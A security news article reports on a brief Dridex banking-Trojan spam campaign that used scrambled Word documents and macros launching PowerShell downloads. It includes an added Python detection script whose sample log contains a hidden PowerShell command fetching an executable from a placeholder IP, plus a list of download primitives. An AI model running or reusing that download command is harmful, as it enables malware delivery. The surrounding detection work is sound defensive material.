One campaign spews two sets of emails, both carrying Dridex

Apr 7, 2015 08:06 GMT

A new variant of the Dridex banking Trojan has been identified in a recent “hit and run” spam campaign that spread the malware via macro scripts in Word documents with incomprehensible content.

The short-lived operation lasted less than five hours, long enough to claim plenty of victims before antivirus solutions put protection measures in place.

Sneaky macros add malware in the background

Additional evasion tactics employed by the cybercriminals included unique subject lines for the malicious emails and varying the name of the attached Word file.

Security researchers at Cisco’s Talos research group noticed that recycling the file name occurred in less than 5% of the cases.

The investigation revealed that two types of emails were sent, both containing Word files with embedded macros that pointed to a Dridex download. One of them was peculiar, however: the message body was empty, and the email consisted of nothing but the attachment.

Upon opening the document, the victim would see text characters that made no sense. The technique is meant to trick the potential victim into enabling macro support and, with it, the malware download.

By default, macro scripts are disabled in Microsoft Office applications, since the feature has been abused in the past for malware delivery. Anyone who needs macros (simple scripts that carry out repetitive tasks) for their work can enable them, but not before seeing an alert about the risk of doing so.

Cybercriminals purposely add the scrambled text in the document and inform the recipient that incorrect viewing of the information is due to macros being disabled.

Once the script becomes active, it relies on PowerShell to download and execute Dridex from a hard-coded IP address.
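Because the macro chain ends with Word launching PowerShell to fetch a payload from a hard-coded IP address, process-creation telemetry gives a more durable detection than a document hash that changes with every attachment. The following is an added example, not code from the article or from Talos; it assumes JSON process-creation events with `parent_image`, `image` and `command_line` fields (constructed here) and flags the Office-to-PowerShell-with-raw-IP-download pattern.

```python
import json
import re

# Office applications that have no ordinary reason to spawn PowerShell (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Indicators of the chain described above: PowerShell fetching a payload from a raw IP.
IPV4_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.IGNORECASE)
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient")

def classify_event(event):
    """Return the reasons a process-creation event resembles the macro-to-PowerShell chain."""
    parent = event.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("command_line", "")
    reasons = []
    if image == "powershell.exe" and parent in OFFICE_PARENTS:
        reasons.append(f"powershell.exe spawned by Office process {parent}")
        if any(hint in cmdline.lower() for hint in DOWNLOAD_HINTS):
            reasons.append("command line contains a download primitive")
        if IPV4_URL.search(cmdline):
            reasons.append("download URL points at a raw IP address")
    return reasons

def scan_log(lines):
    """Parse JSON process-creation events; return [(pid, reasons)] for suspicious ones."""
    findings = []
    for line in lines:
        event = json.loads(line)
        reasons = classify_event(event)
        if reasons:
            findings.append((event["pid"], reasons))
    return findings

# Constructed sample telemetry (not real campaign data); 192.0.2.10 is a documentation address.
SAMPLE_LOG = [json.dumps(e) for e in (
    {"pid": 4120, "parent_image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden (New-Object Net.WebClient)"
                     ".DownloadFile('http://192.0.2.10/up.exe', $env:TEMP + '\\up.exe')"},
    {"pid": 4188, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-Process"},
    {"pid": 4201, "parent_image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "command_line": "splwow64.exe 12288"},
)]

if __name__ == "__main__":
    for pid, reasons in scan_log(SAMPLE_LOG):
        print(pid, "; ".join(reasons))
```

Only the Word-spawned PowerShell event is reported; an interactive PowerShell session and a benign Word child process pass through untouched.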

Short operations end before detection is created

In the second malicious email seen by the researchers, text is available in the body, and it purports to be financial information, pointing the recipient to the attachment to check the invoice.

The content of the document is also unintelligible, and if macros are enabled, the same routine leads to the download of the Dridex banking Trojan.

Detection for the Word documents was poor at the beginning and improved only later on, covering just the last part of the campaign.

Talos threat researcher Nick Biasini says in a blog post on Monday that short-lived cybercriminal operations often fly under the radar of antivirus solutions because detection is introduced only after they have completed.

In an example he provided, a variant of Dridex was distributed for 9.1 hours before security solutions could respond. The peak of the campaign, however, lasted only three hours, ending some five hours before antivirus could identify the new malware strain.

[Images: Antivirus detection can sometimes come too late; Scrambled text in malicious Word file; Email sample from the second campaign]